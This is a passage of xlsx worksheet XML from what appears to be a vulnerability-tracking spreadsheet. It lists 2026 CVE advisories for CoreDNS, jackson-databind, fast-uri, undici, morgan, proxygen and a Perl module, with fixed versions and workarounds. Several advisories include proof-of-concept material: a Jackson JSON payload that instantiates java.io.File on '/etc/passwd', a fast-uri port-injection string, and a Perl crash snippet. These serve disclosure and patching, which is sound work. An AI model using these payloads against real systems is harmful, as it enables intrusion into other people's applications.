        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P352" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q352" s="5" t="inlineStr"/>
      <c r="R352" s="5" t="inlineStr"/>
      <c r="S352" s="5" t="inlineStr">
        <is>
          <t>OpenTelemetry-Go: Log gRPC exporter ignores env TLS certs, bypassing mTLS/pinning in go.opentelemetry.io/otel/exporters/otlp/otlplog/otlploggrpc</t>
        </is>
      </c>
      <c r="T352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81871</t>
        </is>
      </c>
    </row>
    <row r="353">
      <c r="A353" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B353" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82399</t>
        </is>
      </c>
      <c r="D353" s="5" t="inlineStr"/>
      <c r="E353" s="5" t="inlineStr"/>
      <c r="F353" s="5" t="inlineStr"/>
      <c r="G353" s="5" t="inlineStr"/>
      <c r="H353" s="5" t="inlineStr"/>
      <c r="I353" s="5" t="inlineStr"/>
      <c r="J353" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K353" s="5" t="inlineStr"/>
      <c r="L353" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/coredns/coredns</t>
        </is>
      </c>
      <c r="M353" s="5" t="inlineStr">
        <is>
          <t>1.14.7</t>
        </is>
      </c>
      <c r="N353" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O353" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P353" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q353" s="5" t="inlineStr"/>
      <c r="R353" s="5" t="inlineStr"/>
      <c r="S353" s="5" t="inlineStr">
        <is>
          <t>CoreDNS: Unauthenticated memory exhaustion in custom transports in github.com/coredns/coredns</t>
        </is>
      </c>
      <c r="T353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82399</t>
        </is>
      </c>
    </row>
    <row r="354">
      <c r="A354" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B354" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83557</t>
        </is>
      </c>
      <c r="D354" s="5" t="inlineStr"/>
      <c r="E354" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F354" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G354" s="5" t="inlineStr"/>
      <c r="H354" s="5" t="inlineStr"/>
      <c r="I354" s="5" t="inlineStr"/>
      <c r="J354" s="5" t="inlineStr">
        <is>
          <t>jackson, jackson-databind, fasterxml, maven</t>
        </is>
      </c>
      <c r="K354" s="5" t="inlineStr"/>
      <c r="L354" s="5" t="inlineStr">
        <is>
          <t>Maven:com.fasterxml.jackson.core:jackson-databind, Maven:tools.jackson.core:jackson-databind</t>
        </is>
      </c>
      <c r="M354" s="5" t="inlineStr">
        <is>
          <t>2.18.10, 2.21.6, 2.22.2, 3.1.6, 3.2.2</t>
        </is>
      </c>
      <c r="N354" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O354" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P354" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q354" s="5" t="inlineStr"/>
      <c r="R354" s="5" t="inlineStr"/>
      <c r="S354" s="5" t="inlineStr">
        <is>
          <t>### Summary
`DefaultBaseTypeLimitingValidator` — the `PolymorphicTypeValidator` used automatically whenever `@JsonTypeInfo` is applied without an explicitly configured custom validator — denies polymorphic resolution only for nine specific "unsafe base types" (`Object`, `Serializable`, `Closeable`, `AutoCloseable`, `Cloneable`, `Runnable`, `java.util.logging.Handler`, `javax.naming.Referenceable`, `javax.sql.DataSource`). Its `isSafeSubType()` returns `true` unconditionally for every other base type. `java.lang.Comparable` is not in that list, despite being implemented by a very large fraction of JDK and application classes — comparable in breadth to `Serializable`, which is denylisted for exactly that reason. An application with an `@JsonTypeInfo`-annotated `Comparable`-typed property, and no custom validator configured, will accept a type identifier for essentially any class implementing `Comparable`.
### Details
**Affected file:** `src/main/java/tools/jackson/databind/jsontype/DefaultBaseTypeLimitingValidator.java`
```java
private final static class UnsafeBaseTypes {
    private final Set&lt;String&gt; UNSAFE = new HashSet&lt;&gt;();
    {
        UNSAFE.add(Object.class.getName());
        UNSAFE.add(java.io.Closeable.class.getName());
        UNSAFE.add(java.io.Serializable.class.getName());
        UNSAFE.add(AutoCloseable.class.getName());
        UNSAFE.add(Cloneable.class.getName());
        UNSAFE.add(Runnable.class.getName());          // [databind#5014]
        UNSAFE.add("java.util.logging.Handler");
        UNSAFE.add("javax.naming.Referenceable");
        UNSAFE.add("javax.sql.DataSource");
        // java.lang.Comparable is NOT present here
    }
}
protected boolean isSafeSubType(DatabindContext ctxt,
        JavaType baseType, JavaType subType) {
    return true;   // unconditional for every base type not in UNSAFE
}
```
The class's own JavaDoc acknowledges the design (*"Note that when using potentially unsafe base type like `java.lang.Object` a custom implementation... is needed"*), so the trade-off of leaving broad base types unrestricted is intentional. The gap is that `Comparable` has the same breadth of implementers as the types this class *does* restrict, and its absence looks like an oversight rather than a deliberate choice — consistent with the ongoing, incremental nature of this list (`Runnable` was added recently for issue #5014).
This is specific to the **default, unconfigured validator** reached via bare `@JsonTypeInfo` usage. Global "Default Typing" via `activateDefaultTyping()` is **not** affected, because that method structurally requires an explicit `PolymorphicTypeValidator` argument — a correctly-configured `BasicPolymorphicTypeValidator` rejects the same payload under `activateDefaultTyping()`.
### PoC
Built entirely from source (jackson-databind + jackson-core + jackson-annotations, `javac`, OpenJDK 21, no third-party gadget libraries, no network access):
**1. Sanity check (benign class, confirms the mechanism fires):**
```java
static class SafeThing implements Comparable&lt;SafeThing&gt; {
    public String name;
    public SafeThing() {}
    public int compareTo(SafeThing o) { return 0; }
}
static class Holder {
    @JsonTypeInfo(use = JsonTypeInfo.Id.CLASS)
    public Comparable&lt;?&gt; value;
}
ObjectMapper mapper = JsonMapper.builder().build();   // no custom PTV
String json = "{\"value\":{\"@class\":\"...SafeThing\",\"name\":\"hello\"}}";
Holder h = mapper.readValue(json, Holder.class);
// RESULT: ACCEPTED, class=...SafeThing
```
**2. Real JDK class substitution:**
```java
String json = "{\"value\":[\"java.io.File\",\"/etc/passwd\"]}";
Holder h = mapper.readValue(json, Holder.class);
// RESULT: ACCEPTED, class=java.io.File value=/etc/passwd
```
**3. Negative control — Default Typing with an explicit custom PTV:**
```java
PolymorphicTypeValidator ptv = BasicPolymorphicTypeValidator.builder()
    .allowIfSubType("PtvGapTest4").build();
ObjectMapper mapper = JsonMapper.builder()
    .activateDefaultTyping(ptv, DefaultTyping.NON_FINAL).build();
// same java.io.File payload
// RESULT: REJECTED - InvalidTypeIdException: "...denied resolution"
```
**Observed output:**
$ java -cp .:build/classes PtvGapTest3
Trying: {"value":["java.io.File","/etc/passwd"]}
ACCEPTED, class=java.io.File value=/etc/passwd
$ java -cp .:build/classes PtvGapTest4
Trying malicious substitution: ["PtvGapTest4$Holder",{"value":["java.io.File","/etc/passwd"]}]
REJECTED - InvalidTypeIdException: Could not resolve type id 'java.io.File' as a
subtype of java.lang.Comparable: Configured PolymorphicTypeValidator denied resolution
### Impact
Any application declaring an `@JsonTypeInfo`-annotated property or class with `Comparable` as its base type, without a separately configured restrictive `PolymorphicTypeValidator`, will accept a type identifier for essentially any class implementing `Comparable`. Concrete impact is demonstrated via `java.io.File`: an attacker can cause construction of a `File` object for an arbitrary, attacker-chosen path. On its own this is a controlled-object-instantiation primitive; if the application later calls path-sensitive or mutating methods on the received value, this becomes a path-traversal-adjacent primitive. 
**Suggested remediation:**
1. Add `java.lang.Comparable` to `UnsafeBaseTypes.UNSAFE`.
2. Audit other broad JDK interfaces (`java.lang.Iterable`, `java.util.EventListener`) for the same gap.
3. Consider a narrower default for `isSafeSubType()` for base types outside the fixed denylist, rather than unconditional `true`.</t>
        </is>
      </c>
      <c r="T354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83557</t>
        </is>
      </c>
    </row>
    <row r="355">
      <c r="A355" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B355" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84292</t>
        </is>
      </c>
      <c r="D355" s="5" t="inlineStr"/>
      <c r="E355" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F355" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G355" s="5" t="inlineStr"/>
      <c r="H355" s="5" t="inlineStr"/>
      <c r="I355" s="5" t="inlineStr"/>
      <c r="J355" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K355" s="5" t="inlineStr"/>
      <c r="L355" s="5" t="inlineStr">
        <is>
          <t>npm:fast-uri</t>
        </is>
      </c>
      <c r="M355" s="5" t="inlineStr">
        <is>
          <t>2.4.6, 3.1.7, 4.1.4</t>
        </is>
      </c>
      <c r="N355" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O355" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P355" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q355" s="5" t="inlineStr"/>
      <c r="R355" s="5" t="inlineStr"/>
      <c r="S355" s="5" t="inlineStr">
        <is>
          <t>### Impact
`fast-uri` serializes the `port` component of a URI without validating it. When recomposing the authority, `fast-uri` escapes the userinfo and host components but concatenates the port verbatim, so a `port` value that is not a sequence of digits can inject authority delimiters. For example, serializing a component whose `port` is `@127.0.0.1:8124` produces `http://trusted.example:@127.0.0.1:8124/app`, demoting the intended host to userinfo and pointing the authority at an attacker-controlled host. Both `fast-uri` and Node's `URL` read the result back as the attacker's host with no error, so re-validating the built URI does not catch it.
This affects applications that build URIs from parts and assign untrusted data to the `port` component (for example a fixed host from configuration and a port taken from user input or a service record). The same path is reachable through `serialize()`, `normalize()`, and `equal()` in their object forms. A `port` obtained from `parse()` is always digits and is not affected.
### Patches
This vulnerability has been patched in fast-uri `4.1.4`, `3.1.7`, and `2.4.6`. `recomposeAuthority` now rejects any port that is not `*DIGIT` per RFC 3986. All users should upgrade.
### Workarounds
If upgrading is not immediately possible, validate the `port` value against the RFC 3986 grammar (digits only) before passing a component to `serialize()`, `normalize()`, or `equal()`, and reject anything else, for example `if (!/^\d*$/.test(String(port))) throw new Error('invalid port')`.</t>
        </is>
      </c>
      <c r="T355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84292</t>
        </is>
      </c>
    </row>
    <row r="356">
      <c r="A356" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B356" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84394</t>
        </is>
      </c>
      <c r="D356" s="5" t="inlineStr"/>
      <c r="E356" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F356" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G356" s="5" t="inlineStr"/>
      <c r="H356" s="5" t="inlineStr"/>
      <c r="I356" s="5" t="inlineStr"/>
      <c r="J356" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K356" s="5" t="inlineStr"/>
      <c r="L356" s="5" t="inlineStr">
        <is>
          <t>npm:fast-uri</t>
        </is>
      </c>
      <c r="M356" s="5" t="inlineStr">
        <is>
          <t>2.4.6, 3.1.7, 4.1.4</t>
        </is>
      </c>
      <c r="N356" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O356" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P356" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q356" s="5" t="inlineStr"/>
      <c r="R356" s="5" t="inlineStr"/>
      <c r="S356" s="5" t="inlineStr">
        <is>
          <t>### Impact
`fast-uri` accepts a host that contains an unbalanced or misplaced authority bracket (`[` or `]`) without reporting an error. A host that starts with `[` but does not end with `]`, such as `[@127.0.0.1`, is neither validated as an IP literal nor canonicalized as a domain name, so `parse()` returns it as the host with `error` undefined, while Node's `URL` (and `http.get`, `axios`, `got`, and other clients built on it) resolve the same string to `127.0.0.1`. An application that reads `parse().host` to make a host decision (an SSRF denylist, a redirect allowlist, or proxy routing) and then passes the original URL to an HTTP client evaluates its policy against a string that is not the host the request reaches. The same host is carried through `normalize()`, `equal()`, and `resolve()`.
### Patches
This vulnerability has been patched in fast-uri `4.1.4`, `3.1.7`, and `2.4.6`. `parse()` now reports `URI host is malformed.` for any host that contains a bracket but is not a valid `[IPv6]` literal. All users should upgrade.
### Workarounds
If upgrading is not immediately possible, reject any URL whose host contains a `[` or `]` that is not a well-formed IPv6 literal before making a host decision. Clients that fail closed on credential-bearing URLs, such as Node's global `fetch()`, are not affected by the reported vector.</t>
        </is>
      </c>
      <c r="T356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84394</t>
        </is>
      </c>
    </row>
    <row r="357">
      <c r="A357" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B357" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84894</t>
        </is>
      </c>
      <c r="D357" s="5" t="inlineStr"/>
      <c r="E357" s="5" t="inlineStr"/>
      <c r="F357" s="5" t="inlineStr"/>
      <c r="G357" s="5" t="inlineStr"/>
      <c r="H357" s="5" t="inlineStr"/>
      <c r="I357" s="5" t="inlineStr"/>
      <c r="J357" s="5" t="inlineStr"/>
      <c r="K357" s="5" t="inlineStr"/>
      <c r="L357" s="5" t="inlineStr"/>
      <c r="M357" s="5" t="inlineStr"/>
      <c r="N357" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O357" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P357" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q357" s="5" t="inlineStr"/>
      <c r="R357" s="5" t="inlineStr"/>
      <c r="S357" s="5" t="inlineStr">
        <is>
          <t>In moxygen before commit 004123dd24c3, MoQSession::dataStreamReadLoop keeps using a stream read handle after reading a FIN, which invalidates the handle under proxygen's WebTransport API. A remote peer can trigger the stale use by opening a data stream that names an unknown track alias and carries the FIN in the same write.</t>
        </is>
      </c>
      <c r="T357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84894</t>
        </is>
      </c>
    </row>
    <row r="358">
      <c r="A358" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B358" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84895</t>
        </is>
      </c>
      <c r="D358" s="5" t="inlineStr"/>
      <c r="E358" s="5" t="inlineStr"/>
      <c r="F358" s="5" t="inlineStr"/>
      <c r="G358" s="5" t="inlineStr"/>
      <c r="H358" s="5" t="inlineStr"/>
      <c r="I358" s="5" t="inlineStr"/>
      <c r="J358" s="5" t="inlineStr"/>
      <c r="K358" s="5" t="inlineStr"/>
      <c r="L358" s="5" t="inlineStr"/>
      <c r="M358" s="5" t="inlineStr"/>
      <c r="N358" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O358" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P358" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q358" s="5" t="inlineStr"/>
      <c r="R358" s="5" t="inlineStr"/>
      <c r="S358" s="5" t="inlineStr">
        <is>
          <t>In proxygen from v2026.04.06.00 until v2026.09.28.00, QuicWtSession::closeSession accesses its member fields after calling the base QuicWtSessionBase::closeSession method. The base method notifies the session handler, which may release the last reference to the session and destroy it.</t>
        </is>
      </c>
      <c r="T358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84895</t>
        </is>
      </c>
    </row>
    <row r="359">
      <c r="A359" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B359" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85024</t>
        </is>
      </c>
      <c r="D359" s="5" t="inlineStr"/>
      <c r="E359" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F359" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G359" s="5" t="inlineStr"/>
      <c r="H359" s="5" t="inlineStr"/>
      <c r="I359" s="5" t="inlineStr"/>
      <c r="J359" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K359" s="5" t="inlineStr"/>
      <c r="L359" s="5" t="inlineStr">
        <is>
          <t>npm:undici</t>
        </is>
      </c>
      <c r="M359" s="5" t="inlineStr">
        <is>
          <t>6.28.1, 7.29.1, 8.10.2</t>
        </is>
      </c>
      <c r="N359" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O359" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P359" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q359" s="5" t="inlineStr"/>
      <c r="R359" s="5" t="inlineStr"/>
      <c r="S359" s="5" t="inlineStr">
        <is>
          <t>## Impact
undici's WebSocket client (including Node.js's bundled `globalThis.WebSocket`) crashes the entire Node.js process when a remote WebSocket peer sends a permessage-deflate compressed message that crosses the decompressed-payload size limit and then contains a malformed DEFLATE block. In `lib/web/websocket/permessage-deflate.js`, the size-limit cleanup calls `removeAllListeners()` on the internal zlib `InflateRaw`, removing its `error` listener, but leaves the stream running. The inflater then emits a `Z_DATA_ERROR` with no listener attached, which Node.js treats as a fatal unhandled `error` event and terminates the process. Application `error`/`close` handlers on the public WebSocket cannot observe or prevent this, because the failing object is the internal `InflateRaw`.
A malicious or compromised WebSocket server can crash a client with a single connection, unauthenticated and without any application mistake. The attack is asymmetric (about 130 KB on the wire expands past the limit) and can be repeated on reconnect (crash loop).
Affected applications are those using the undici WebSocket client (`new WebSocket(...)`) or Node.js's bundled `globalThis.WebSocket` that can be induced to connect to an attacker-controlled or compromised WebSocket endpoint.
## Patches
Upgrade to undici v6.28.1, v7.29.1 or v8.10.2.
## Workarounds
No workaround is available.</t>
        </is>
      </c>
      <c r="T359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85024</t>
        </is>
      </c>
    </row>
    <row r="360">
      <c r="A360" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B360" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85644</t>
        </is>
      </c>
      <c r="D360" s="5" t="inlineStr"/>
      <c r="E360" s="5" t="inlineStr"/>
      <c r="F360" s="5" t="inlineStr"/>
      <c r="G360" s="5" t="inlineStr"/>
      <c r="H360" s="5" t="inlineStr"/>
      <c r="I360" s="5" t="inlineStr"/>
      <c r="J360" s="5" t="inlineStr"/>
      <c r="K360" s="5" t="inlineStr"/>
      <c r="L360" s="5" t="inlineStr"/>
      <c r="M360" s="5" t="inlineStr"/>
      <c r="N360" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O360" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P360" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q360" s="5" t="inlineStr"/>
      <c r="R360" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-843</t>
        </is>
      </c>
      <c r="S360" s="5" t="inlineStr">
        <is>
          <t>XS::Parse::Infix versions from 0.40 through 0.49 for Perl treat a number as an array reference.
The wrapper function XS::Parse::Infix generates for a list-associative infix operator checks whether arguments are array references, but it tests using SvRV() rather than SvROK(). SvRV() reads a union slot that only holds a referent once SvROK(sv) is true, so the guard never validates that it is a reference. For an IV or NV that slot holds the number itself, SvRV() returns the caller's value and SvTYPE() dereferences it at offset 12. This will generally result in a segmentation fault.
An application that hands the wrapper a list built from decoded input (for example, from JSON) lets whoever supplies a number in that list choose the address that the interpreter dereferences.
An ordinary string's byte 12 is rarely SVt_PVAV so the guard croaks by luck, but an attacker-crafted string carrying 0x0b there passes, and the buffer is then used as an AV head, with AvARRAY taken from bytes 16-23 and its entries pushed onto the Perl stack as live SVs.
A simple proof-of-concept uses the zip operator:
    use Syntax::Operator::Zip 'zip';
    my @args = ([1], 2);
    zip(@args);</t>
        </is>
      </c>
      <c r="T360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85644</t>
        </is>
      </c>
    </row>
    <row r="361">
      <c r="A361" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B361" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86003</t>
        </is>
      </c>
      <c r="D361" s="5" t="inlineStr"/>
      <c r="E361" s="5" t="inlineStr"/>
      <c r="F361" s="5" t="inlineStr"/>
      <c r="G361" s="5" t="inlineStr"/>
      <c r="H361" s="5" t="inlineStr"/>
      <c r="I361" s="5" t="inlineStr"/>
      <c r="J361" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K361" s="5" t="inlineStr"/>
      <c r="L361" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/coredns/coredns</t>
        </is>
      </c>
      <c r="M361" s="5" t="inlineStr">
        <is>
          <t>1.14.7</t>
        </is>
      </c>
      <c r="N361" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O361" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P361" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q361" s="5" t="inlineStr"/>
      <c r="R361" s="5" t="inlineStr"/>
      <c r="S361" s="5" t="inlineStr">
        <is>
          <t>CoreDNS DoH/DoQ/gRPC bypass UPDATE rejection enforced on UDP/TCP in github.com/coredns/coredns</t>
        </is>
      </c>
      <c r="T361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86003</t>
        </is>
      </c>
    </row>
    <row r="362">
      <c r="A362" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B362" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86043</t>
        </is>
      </c>
      <c r="D362" s="5" t="inlineStr"/>
      <c r="E362" s="5" t="inlineStr"/>
      <c r="F362" s="5" t="inlineStr"/>
      <c r="G362" s="5" t="inlineStr"/>
      <c r="H362" s="5" t="inlineStr"/>
      <c r="I362" s="5" t="inlineStr"/>
      <c r="J362" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K362" s="5" t="inlineStr"/>
      <c r="L362" s="5" t="inlineStr">
        <is>
          <t>Go:github.com/zalando/skipper</t>
        </is>
      </c>
      <c r="M362" s="5" t="inlineStr">
        <is>
          <t>0.27.37</t>
        </is>
      </c>
      <c r="N362" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O362" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P362" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q362" s="5" t="inlineStr"/>
      <c r="R362" s="5" t="inlineStr"/>
      <c r="S362" s="5" t="inlineStr">
        <is>
          <t>Skipper has OPA body-authz bypass: truncated_body mitigation fails open on chunked/HTTP-2 (incomplete fix GHSA-8qqm-fp2q-v734) in github.com/zalando/skipper</t>
        </is>
      </c>
      <c r="T362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86043</t>
        </is>
      </c>
    </row>
    <row r="363">
      <c r="A363" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B363" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87859</t>
        </is>
      </c>
      <c r="D363" s="5" t="inlineStr"/>
      <c r="E363" s="5" t="inlineStr">
        <is>
          <t>MODERATE</t>
        </is>
      </c>
      <c r="F363" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G363" s="5" t="inlineStr"/>
      <c r="H363" s="5" t="inlineStr"/>
      <c r="I363" s="5" t="inlineStr"/>
      <c r="J363" s="5" t="inlineStr">
        <is>
          <t>npm</t>
        </is>
      </c>
      <c r="K363" s="5" t="inlineStr"/>
      <c r="L363" s="5" t="inlineStr">
        <is>
          <t>npm:morgan</t>
        </is>
      </c>
      <c r="M363" s="5" t="inlineStr">
        <is>
          <t>1.12.1</t>
        </is>
      </c>
      <c r="N363" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O363" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P363" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q363" s="5" t="inlineStr"/>
      <c r="R363" s="5" t="inlineStr"/>
      <c r="S363" s="5" t="inlineStr">
        <is>
          <t>### Impact
Morgan writes attacker-controlled request data to the access log. Its escaping (added in 1.11.0 and 1.12.0) neutralizes control characters, the Unicode line separators, and backslash, but not the double quote (`0x22`), which is the field delimiter of the Apache combined log format morgan emits. An attacker who controls a quoted field (`:user-agent`, `:referrer`, the request URL, or the Basic auth `:remote-user`) can inject a double quote to close the field early and forge additional fields in the log record. The `combined`, `common`, and `default` formats, and any custom format that quotes a token, are affected. This is an incomplete fix of CVE-2026-5078 and CVE-2026-15603.
### Patches
Users should upgrade to version 1.12.1.
### Workarounds
Update to version 1.12.1.</t>
        </is>
      </c>
      <c r="T363" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87859</t>
        </is>
      </c>
    </row>
    <row r="364">
      <c r="A364" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B364" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C364" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-88058</t>
        </is>
      </c>
      <c r="D364" s="5" t="inlineStr"/>
      <c r="E364" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F364" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G364" s="5" t="inlineStr"/>
      <c r="H364" s="5" t="inlineStr"/>
      <c r="I364" s="5" t="inlineStr"/>
      <c r="J364" s="5" t="inlineStr">
        <is>
          <t>npm, angular</t>
        </is>
      </c>
      <c r="K364" s="5" t="inlineStr"/>
      <c r="L364" s="5" t="inlineStr">
        <is>
          <t>npm:@angular/platform-server</t>
        </is>
      </c>
      <c r="M364" s="5" t="inlineStr">
        <is>
          <t>20.3.30, 21.2.22, 22.1.4</t>
        </is>
      </c>
      <c r="N364" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O364" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P364" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q364" s="5" t="inlineStr"/>
      <c r="R364" s="5" t="inlineStr"/>
      <c r="S364" s="5" t="inlineStr">
        <is>
          <t>### Summary
